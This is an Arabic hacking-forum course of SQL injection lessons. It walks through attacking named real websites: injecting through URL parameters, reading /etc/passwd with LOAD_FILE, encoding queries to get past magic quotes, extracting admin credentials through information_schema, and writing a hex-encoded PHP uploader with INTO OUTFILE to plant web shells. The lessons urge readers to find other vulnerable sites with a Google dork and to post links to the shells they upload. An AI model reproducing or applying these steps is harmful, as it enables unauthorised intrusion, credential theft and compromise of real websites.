سنستعين بالهاك بار في الفايرفوكس حتى تسهل علينا الحقن واستعراض وتعديل العناوين الطويلة.

للتحميل : https://addons.mozilla.org/en-US/firefox/addon/3899

نبدأ مباشرة في التطبيق على الموقع الإسرائيلي الذي طرحه الأخ الأميرال

الأعمدة المصابة هي العمود 1 و 2 :

http://www.virtualjerusalem.com/news.php?i…6,7,8,9,10,11–

إصدار قاعدة البيانات هو الرابع 4.1.20 :

http://www.virtualjerusalem.com/news.php?i…6,7,8,9,10,11–

لمعرفة المستخدم الحالي الذي تستعمله نطبق الاستعلام التالي :

http://www.virtualjerusalem.com/news.php?i…6,7,8,9,10,11–

كنتيجة يظهر لنا أن اسم المستخدم هو vjuser@localhost

ولمعرفة صلاحيات هذا المستخدم نطبق الاستعلام التالي :

http://www.virtualjerusalem.com/news.php?i…=%27vjuser%27–

النتيجة هي Y يعني لنا الحق في القراءة والكتابة حسب الصلاحيات المحددة في السيرفر.

الآن يجب أن نرى هل magic quotes مشغلة = On أو لا = OFF

مــــــــــا هي ال magic quotes ؟

magic quotes هو فلتر أو خاصية موجودة ب PHP تمكن من إضافة رمز \ عند كتابة أي شيء يحتوي على علامة الإقتباس ‘ أو “.

إذن وظيفة هذه الخاصية أمنية بحيث “تحد” من الحقن وتساعد المبتدئين في البرمجة. للإشارة ابتداء من النسخة السادسة ل PHP ستحذف هذه الخاصية.

لنرى هل هي مشغلة في الموقع الذي نريد اختراقه :

http://www.virtualjerusalem.com/news.php?i…6,7,8,9,10,11–

النتيجة في الصورة التالية :

 

This image has been resized. Click this bar to view the full image. The original image is sized 1280×1024.

تم كتابة الكلمة test كما هي دون إضافة الرمز \ مما يعني أن magic quotes غير مشغلة وهذا يسهل علينا الأمور :P

الآن بإمكاننا استخدام الاستعلام دون تشفيره, لقراءة ملف من السيرفر نستعمل الاستعلام مع LOAD_FILE.

مثلا لاستعراض محتوى ملف /etc/passwd على السيرفر نطبق الاستعلام التالي :

http://www.virtualjerusalem.com/news.php?i…6,7,8,9,10,11–

النتيجة في الصورة :

 

This image has been resized. Click this bar to view the full image. The original image is sized 1280×1024.

ليكون الدرس كاملا لنفترض مثلا أننا وجدنا magic quotes مشغلة ماذا سنفعل ؟

الجواب ببساطة هو تشفير ما بداخل LOAD_FILE حتى لا تظهر ‘ أو “

هناك طريقتان للتشفير إما بالهكس أو باستعمال CHAR وهناك عدة أدوات ومواقع تقوم بهذا الغرض.

بالنسبة ل CHAR يمكننا استعمال الهاك بار في الفيرفوكس.

سنستعين بالموقع التالي لتشفير /etc/passwd بكلتا الطريقتين :

http://h4k.in/encoding/index.php

بالهكس نحصل على 0x2f6574632f706173737764 والتطبيق يكون كالتالي :

http://www.virtualjerusalem.com/news.php?i…6,7,8,9,10,11–

الصورة :

 

This image has been resized. Click this bar to view the full image. The original image is sized 1280×1024.

بالشار كود نحصل على
Char(47),Char(101),Char(116),Char(99),Char(47),Cha r(112),Char(97),Char(115),Char
(115),Char(119),Char(100)

التطبيق يكون كالتالي :

http://www.virtualjerusalem.com/news.php?i…ad_file(CHAR(47, 101, 116, 99, 47, 112, 97, 115, 115, 119, 100)),2,3,4,5,6,7,8,9,10,11–

النتيجة في الصورة :

 

This image has been resized. Click this bar to view the full image. The original image is sized 1280×1024.

وبهذا نكون قد تخطينا magic quotes إذا كانت مشغلة.

الآن نأتي لكيفية رفع الشل.

الخطوة الأولى لرفع الشل هي معرفة مسار مجلد الويب (web directory).

هناك طرق عديدة إذا لم تشتغل إحداها نجرب الأخرى.

أسهل طريقة هي محاولة افتعال خطأ, في حالتنا يظهر الخطأ والمسار معه بوضوح في الصورة التالية :

 

This image has been resized. Click this bar to view the full image. The original image is sized 1280×1024.

المسار الصحيح هو كالتالي /var/www/www.virtualjerusalem.com/

للتأكد من ذلك يكفي استعراض أحد الملفات التي نراها في الموقع مثلا :

http://www.virtualjerusalem.com/robots.txt

لاستعراضه من خلال الثغرة نطبق الاستعلام التالي :

 

This image has been resized. Click this bar to view the full image. The original image is sized 1280×1024.

وبالتالي المسار صحيح.

لنفترض أن الخطأ لم يظهر لنا المسار, كيف يمكن أن نعرفه ؟

هنا نستعين أيضا ب LOAD_FILE لعرض أحد ملفات السيرفر التي يوجد بها مسار web directory.

ولكن حتى الملف الذي سنستعرضه لسنا متأكدين من مسار وجوده لذلك يبقى التخمين والتجريب هو الحل. للمساعدة هذه لائحة بالمسار المفترض الذي يوجد به الملف الذي يضم مسار مجلد الويب :

 

كود:
/etc/init.d/apache
/etc/init.d/apache2
/etc/httpd/httpd.conf
/etc/apache/apache.conf
/etc/apache/httpd.conf
/etc/apache2/apache2.conf
/etc/apache2/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache/conf/httpd.conf
/opt/apache/conf/httpd.conf
/home/apache/httpd.conf
/home/apache/conf/httpd.conf
/etc/apache2/sites-available/default
/etc/apache2/vhosts.d/default_vhost.include

الآن نأتي لكتابة ملف في السيرفر :

لكتابة ملف نستعمل الأمر INTO OUTFILE مع محتوى الملف ومساره الكامل بالسيرفر.

للتجريب سنضيف ملفا نصيا بالسيرفر بمجلد /tmp نسميه test.txt ويحتوي على كلمة Alkindiii

الاستعلام والنتائج في الصورة التالية :

 

This image has been resized. Click this bar to view the full image. The original image is sized 1280×1024.

طبعا كنتيجة ظهر لدينا خطأ. للتأكد من أن الملف قد كتب بالسيرفر نستعين مرة أخرى ب LOAD_FILE كما في الصورة :

 

This image has been resized. Click this bar to view the full image. The original image is sized 1280×1024.

بنفس الطريقة المذكورة نرفع الشل بشرط أن تكون لدينا إمكانية الكتابة بمجلد الويب أو بأحد المجلدات في وسطه.

إذا لم تكن لدينا إمكانية الكتابة بالمجلد لا يمكننا رفع الشل والموقع الذي نجرب عليه. في هذا الموقع جربت الكتابة ببعض المجلدات ولكن للأسف ليس هناك تصريح بالكتابة. ولكن على أي حال سنكمل الطريقة.

إيجاد المجلد الذي به تصريح الكتابة يتطلب تجريب كتابة ملف في كل المجلدات حتى نجد المطلوب. ومعرفة المجلدات تأتي بقراءة وتحليل السورس كود الخاص لجميع الصفحات كما يمكننا الاستعانة ببرامج مثل intellitamper الذي يشتغل في ويندوز.

رابط التحميل : http://www.brothersoft.com/intellitamper-10958.html

بالاستعانة بالبرنامج وجدت أن الموقع الذي نطبق عليه به عشرات المجلدات لكن كما قلت لم أجربها جميعا, إذا وجد أحد أعضاء الدورة مجلد به تصريح الكتابة فليكمل المراحل التي سنذكرها لرفع الشل وليخبرنا بالأمر.

لنفترض مثلا أن مجلد images به تصريح كتابة. لرفع الشل إذا كان شل صغير الحجم سنقوم بالكتابة في هذا الملف بنفس الطريقة التي أنشأنا بها ملف test.txt ولكن هذه المرة سنستبدل مسار /tmp ب /var/www/www.virtualjerusalem.com/images ونستبدل الامتداد .txt ب .php وكلمة Alkindiii بالكود الخاص بالشل إذا كان صغيرا على أن يكون مشفر بالهكس.

لنفترض أننا نريد رفع شل كبير الحجم مثل شل صقور أو c99.

في هذه الحالة سنكتب أولا كود صغير بملف يمكننا من رفع أي ملف على السيرفر يدويا.

مثال لكيفية إنشاء الأبلودير http://www.w3schools.com/PHP/php_file_upload.asp

كلما كان الكود مختصرا وصغيرا كلما كان الأمر جيدا, سنطبق على الكود التالي :

 

كود:
<form method="post" enctype="multipart/form-data" action="upload.php">
<p>
<input type="file" name="fichier" size="30">
<input type="submit" name="upload" value="Uploader">
</p>
</form>
<?php
if( isset($_POST['upload']) )
$content_dir = './'; // dossier où sera déplacé le fichier

$tmp_file = $_FILES['fichier']['tmp_name'];

if( !is_uploaded_file($tmp_file) )
{
exit("Le fichier est introuvable");
}
$name_file = $_FILES['fichier']['name'];

if( !move_uploaded_file($tmp_file, $content_dir . $name_file) )
{
exit("Impossible de copier le fichier dans $content_dir");
}

echo "Le fichier a bien été uploadé";
}

?>

بعد ذلك سنحذف كل ما هو زائد ونكتب الكود في سطر واحد ثم نشفره بالهكس :

 

كود:
<form method="post" enctype="multipart/form-data" action="upload.php"><p><input type="file" name="fichier" size="30"><input type="submit" name="upload" value="Uploader"></p></form><? if( isset($_POST['upload']) ) { $content_dir = './'; $tmp_file = $_FILES['fichier']['tmp_name']; if( !is_uploaded_file($tmp_file) ) { exit("Le fichier est introuvable"); } $name_file = $_FILES['fichier']['name']; if( !move_uploaded_file($tmp_file, $content_dir . $name_file) ) { exit("Impossible de copier le fichier dans $content_dir"); } echo "Le fichier a bien été uploadé"; } ?>

ثم نقوم بتشفير هذا السطر بالهكس من خلال الموقع الذي ذكرناه لنحصل على سطر واحد من الهكس لا يحتوي على فراغات :

 

كود:
0x3C666F726D206D6574686F643D22706F73742220656E63747970653D226D756C7469706172742F
666F726D2D646174612220616374696F6E3D2275706C6F61642E706870223E3C703E3C696E707574
2
0747970653D2266696C6522206E616D653D2266696368696572222073697A653D223330223E3C696
E
70757420747970653D227375626D697422206E616D653D2275706C6F6164222076616C75653D2255
7
06C6F61646572223E3C2F703E3C2F666F726D3E3C3F2069662820697373657428245F504F53545B2
7
75706C6F6164275D292029207B2024636F6E74656E745F646972203D20272E2F273B2024746D705F
6
6696C65203D20245F46494C45535B2766696368696572275D5B27746D705F6E616D65275D3B20696
6
28202169735F75706C6F616465645F66696C652824746D705F66696C65292029207B206578697428
2
24C6520666963686965722065737420696E74726F757661626C6522293B207D20246E616D655F666
9
6C65203D20245F46494C45535B2766696368696572275D5B276E616D65275D3B2069662820216D6F
7
6655F75706C6F616465645F66696C652824746D705F66696C652C2024636F6E74656E745F6469722
0
2E20246E616D655F66696C65292029207B20657869742822496D706F737369626C6520646520636F
7
0696572206C6520666963686965722064616E732024636F6E74656E745F64697222293B207D20656
3
686F20224C6520666963686965722061206269656E20E974E92075706C6F6164E9223B207D203F3E

الآن سنكتب هذا الكود بمجلد images بملف نسميه upload.php (على افتراض أن images به تصريح 777)

نطبق الاستعلام التالي :

http://www.virtualjerusalem.com/news.php?i…load.php’–

الآن نذهب إلى http://www.virtualjerusalem.com/images/upload.php

وبعد ذلك بكل بساطة نرفع الشيل من جهازنا وسيحفظ الشل بنفس مكان تواجد الملف upload.php أي :

http://www.virtualjerusalem.com/images/shell.php

وهكذا نكون قد انتهينا.

أرجوا من الإخوة التجريب وتطبيق الدرس, ومن تمكن من التطبيق الصحيح على مواقع أخرى ورفع الشل فليرد على هذا الموضوع بالروابط حتى يستفيد جميع الأعضاء.

أتمنى أن تكون الأمور واضحة في هذا الدرس, ومن لديه سؤال فليقرأ الموضوع جيدا وليبحث قليلا قبل طرحه في قسم استفسارات الدورة وسنجيب عليه إن شاء الله.

جميع الحقوق محفوظة للكاتب Alkindiii ولإدارة منتديات صقور الهكرز www.soqor.net

تحياتي.

5 / 2 : الدرس الخامس : حقن قواعد البيانات sql injection الجزء الثاني

بسم الله الرحمن الرحيم في الدرس الماضي تعلمنا اكتشاف الثغرة واستخراج الاعمدة المصابه ولن اعود لهذا الدرس
ولكن هناك تنويه صغير اذا كان الموقع مفلتر نستخدم — في نهاية الاستعلام واذا لم يك ن نستخدم /*
في هذا الدرس سنشرح حقن الاصدار الرابع واستخراج كلمة مرور و اسم المستخدم للمدير بالحقن وثم سنشرح استغلال الاصدار الخامس واستخراج اليوزر والباس بالاوامر


استغلال الاصدار الخامس
هنا لن نخمن اذا كان الاصدار خامس
ولكن سنستخدم الامر

كود:
Information_schema.colums

http://domiatwindow.net/printarticle…schema.columns

طبعا لاحظ الرابط عوضت بعد from ب Information_schema.colums
ومكان العامود المصاب بـ column_name

ظهر لنا CHARACTER_SET_NAME
الان لدينا طريقتين الاولى ان نتنقل بين الاعمدة بالامر +LIMIT+1+OFFSET+
ليصبح الرابط
http://domiatwindow.net/printarticle…MIT+1+OFFSET+3

لاحظ انتقلنا الى العامود الثالث وهوه MAXLEN
نستمر بالتنقل حتى يظهر لنا عامود او الجدول الذي نريده وهو بالطبع جدول الادمن
التقنل يتم بتغير الرقم اخر الرابط +LIMIT+1+OFFSET+3

كود:
LIMIT+1+OFFSET+8
LIMIT+1+OFFSET+5
LIMIT+1+OFFSET+14
LIMIT+1+OFFSET+44

طبعا اذا ظهر خطأ يعني ان تجاوزت عدد الحقول حاول تصغر الرقم

طيب هذه طريقة وهنالك طريقة اخرى
وهي باستخدام الامر

كود:
WHERE+column_name+LIKE+char()—

وطبعا هذا الامر عليه شويه شغل وسأكتبه بالجزء الخامس والاخير

**************************************************
حمل تولبار الهكر اذا كان متصفحك firefox
من هذا الرابط
https://addons.mozilla.org/en-US/firefox/addon/3899

سنحتاجة بالدرس القادم

مع تحيات صقور الهكرز

الملفات المرفقة

نوع الملف: txt _______________.txt‏ (2.0 كيلوبايت, المشاهدات 91)

5 / 1 : الدرس الخامس : حقن قواعد البيانات sql injection .. (الجزء الأول)


بسم الله الرحمن الرحيمدرس اليوم هو الدرس الخامس حقن قواعد البيانات sql injection

نصيحة قبل البدء : حقن قواعد البيانات سهل وطويل بعض الشيء ولكنه يعتمد على التطبيق يعني كل ماكان التطبيق اكثر كان الموضوع اسهل فأسهل

لمحة عامة ::

الهدف من حقن قواعد البيانات هو الوصول الى جدول مستخدم الموقع ( table )ومن قم الوصول الى عامود اسم المستخدم وكلمة المرور المسؤول للموقع عن طريق استعلامات mysql lang.
وقواعد البيانات إصدارين :
الاصدار الرابع : نتعامل مع هذا الاصدار بالتخمين نستخرج العامود المصاب وقم عدد الاعمدة ونخمن اسم الجدول واليوز والباس لادمن الموقع
الاصدار الخامس : اما في هذا الاصدار فلا حاجة للتخمين حيث نستطيع الوصول الى الجداول عن طريق اوامر معينة وطبعا بعد استخراج عدد الاعمدة والاعمدة المصابة وسنتطرق الى الشرح بالتفصيل عن استغلال الاصدارين
وهذه بعض الاوامر التي سنحتاجها بحقن قواعد البيانات
الاوامر التي سنتطرق اليها
كود
Union+select database() user()
Order+by
Version()
والعديد من الاوامر الاخرى التي سنتطرق اليها لاحقا في هذا الدرس
وطبعا سأتطر الى وضع فيديو او اكثر يشرح كيفية حقن او اختراق موقع

اولا : معرفة الاصابة ومعرفة الاعمدة المصابة مع عددها :

كيف نعرف ان موقع معين مصاب بثغرة حقن قواعد البيانات
يجب ان يكون الموقع php مثلا نهاية الرابط .news.php?id=14 حيث news.php صفحة الphp
, id هو المتغير
نحاول ان نحدث خطأ في قاعدة البيانات
مثال
طبعا الموقع المثال موقع عربي ليس الهدف تخريبة او الحاق الضرر به ولكن لاخذ العلم فقط
http://domiatwindow.net
الان نحاول ان نفتح صفحة يكون فيها الرابط مثل ما اسلفنا يعني يحتوي في نهايته anyword.php?id=number.
طبعا هناك طريقتين لمعرفة الاصابة وسأشرحهما معا واي واحدة تختارها تصلح
الطريقة الاولى :
نضيف للرابط ‘ بعد المتغير فيصبح الرابط http://domiatwindow.net/printarticle.php?id=-1465′
اذا ظهر لك خطأ فهذا يعني ان الموقع مصاب لاحظ الصورة وطبعا ليش شرطا ان يكون هناك خطأ صريح قد تجد تغيرات بالصفحة يعني باختصار ((اذا ظهر لك خطأ او حدث تغير بالصفحة مهما كان فهذا يعني ان الموقع مصاب))
واذا لم يحدث أي تغير فالموقع غير مصاب
الطريقة الثانية :
نضيف للرابط and+1=1 فيصبح الرابط http://domiatwindow.net/printarticle…=-1465+and+1=1
فيفتح الموقع كما هو دون ادنى تغير ولكن عند اضافة and+1=0 حدث تغير او ظهر خطأ
وعند حدوث تغير يعني ان الموقع مصاب
الان عرفنا ان الموقع مصاب نتجة الى معرفة عدد الاعمدة المصابة في الموقع وسنحتاج هنا الى استخدام الامر
Order+by+
بعد الرابط تابع الشرح
هنا نضيف بعد هذا الامر ارقام وعادة نضيف في الاول العدد 2 ليصبح
Order+by+2/*
وطبعا ” /*” هذا امر الاستعلام ويوضع عند نهاية الرابط واحيانا “—” عندما يكون الموقع مفلتر وهذا سيشرح لاحقا
http://domiatwindow.net/printarticle.php?i…65+order+by+2–
طبعا فتح الموقع بشكل عادي دون ظهور أي خطأ نستمر في زيادة الارقام الى ان يظهر لنا خطأ
وطبعا هنا ننوه بأنه لاداعي الى زيادة العدد رقم رقم يعني اولا نجرب

لمعرفة الاعمدة المصابة سنتخدم الامر التالي

كود:
union+select+something

وثم نبدأ

كود:
union+select+1

union+select+1,2
union+select+1,2,3
union+select+1,2,3,4
--------------------------

حتى نصل للرقم المطلوب ..
كان الرابط بعد بعد استعلام عن عدد الاعمدة
http://domiatwindow.net/printarticle.php?i…5+order+by+19–
الان نستخدم union+select
http://domiatwindow.net/printarticle.php?i…5,16,17,18,19–
طبعا في order by كتنا الرقم بدون تسلسل order+by+9
اما في union+select سنسلسل الارقام
كما في الرابط السابق
بعد فتح الرابط ظهر ان 3 5 اعمدة مصابة

وظهرت الارقام كما هي في وسط الصفحة ولكن في بعض الاحيان تكون موجودة في كود الصفحة المصدري او في مناطق اخرى يعني انه ليش شرطا ان تظهر الارقام بشل صريح قد تجدها بالعنوان او بالمصدر او في صورة
الان انتهت الخطوة الاولى وهي معرفة الاصابة ومعرفة الاعمدة المصابة مع عددها
وطبعا هذه الخطوة هي نفسها سواء أكانت اصدار القاعدة الرابع او الخامس
وفي النهاية افتح الغوغل واكتب هذا الدورك ثم افتح المواقع وحاول معرفة اذا كان الموقع مصاب و الاعمدة المصابة
allinurl: “news.php?id=”

وهذا اولا للتخمين

وبعد هذا الشرح للاكتشاف والاستغلال المبدأي ومعرفة عدد الحقول

سيكون هنالك شرح اخر .. عن طريقة الاكتشاف بالملف الكتابي واستخدام القاعدة informations_schema

يا ريت كل واحد يحاول يجرب ويعطينا شو بيطلع معاه

على مواقع غير الموقع المطلوب

انتهى الدرس الخامس الجزء الأول

سلام